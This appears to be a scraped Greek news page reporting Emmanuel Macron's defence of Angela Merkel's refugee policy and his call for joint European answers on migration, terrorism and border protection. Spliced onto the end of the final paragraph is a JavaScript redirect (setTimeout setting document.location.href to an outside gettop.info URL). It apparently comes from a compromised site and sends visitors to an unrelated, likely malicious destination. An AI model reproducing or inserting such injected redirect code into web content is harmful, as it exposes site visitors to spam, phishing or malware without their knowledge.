Μακρόν: Η Μέρκελ διέσωσε την αξιοπρέπειά μας

0
10

 

Υπεραμυνόμενος με σθένος της προσφυγικής πολιτικής της Άνγκελα Μέρκελ, ο υποψήφιος για τη γαλλική προεδρία και πρώην υπουργός Οικονομίας Εμανουέλ Μακρόν τονίζει ότι το να επιρρίπτει κανείς στην καγκελάριο ότι με την υποδοχή των προσφύγων έκανε τη γερμανική πρωτεύουσα και ολόκληρη την Ευρώπη έρμαιο της τρομοκρατίας είναι μια «αηδιαστική υπεραπλούστευση».

Ασκώντας έμμεση κριτική στη νυν γαλλική κυβέρνηση -της οποίας υπήρξε μέλος μέχρι και τον Αύγουστο- για την επιφυλακτική προσφυγική της πολιτική, ο πρώην υπουργός Οικονομίας επισημαίνει ότι με την υποδοχή, φιλοξενία και εκπαίδευση προσφύγων, η καγκελάριος Μέρκελ και το σύνολο της γερμανικής κοινωνίας «διέσωσαν τη συλλογική μας αξιοπρέπεια», όπως σημειώνει η Deutsche Welle.

«Η τρομοκρατία θέλει να καταστρέψει την Ευρώπη»

Το λάθος της Ευρώπης, σύμφωνα με τον ίδιο, είναι ότι δεν αναζήτησε εξαρχής κοινές απαντήσεις στις προκλήσεις της μετανάστευσης. Όταν η Ιταλία αντιμετώπιζε ήδη προ τεσσάρων χρόνων μαζικά προσφυγικά κύματα στη Λαμπεντούζα, Γερμανία και Γαλλία την αφήσαμε μόνη της, λέει χαρακτηριστικά.

Η ασφάλεια της ηπείρου, η διαχείριση της μετανάστευσης και η ενσωμάτωση προσφύγων είναι διαρκείς προκλήσεις τις οποίες η Ευρώπη θα πρέπει να αντιμετωπίσει από κοινού, σύμφωνα με τον Ε. Μακρόν.

«Η λύση έγκειται στην ενίσχυση της ευρωπαϊκής συνεργασίας και όχι σε έναν αναποτελεσματικό εθνικό απομονωτισμό».

Εκτιμώντας, τέλος, ότι η τρομοκρατία θέλει να καταστρέψει την Ευρώπη, ο Εμανουέλ Μακρόν τονίζει ότι θα πρέπει να οικοδομηθεί τάχιστα μια κυρίαρχη Ευρώπη, που θα είναι σε θέση να προστατεύει τους πολίτες της από εξωτερικούς κινδύνους.

Επίσης, και μολονότι τα ανοιχτά σύνορα βοήθησαν τη φυγή του δράστη του Βερολίνου, η ελευθερία της μετακίνησης στον χώρο Σένγκεν θα πρέπει να αίρεται μόνον σε εξαιρετικές περιπτώσεις, όπως λέει. Αντ’ αυτού ο ίδιος ζητά την περαιτέρω ενίσχυση της ευρωπαϊκής συνοριοφυλακής. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here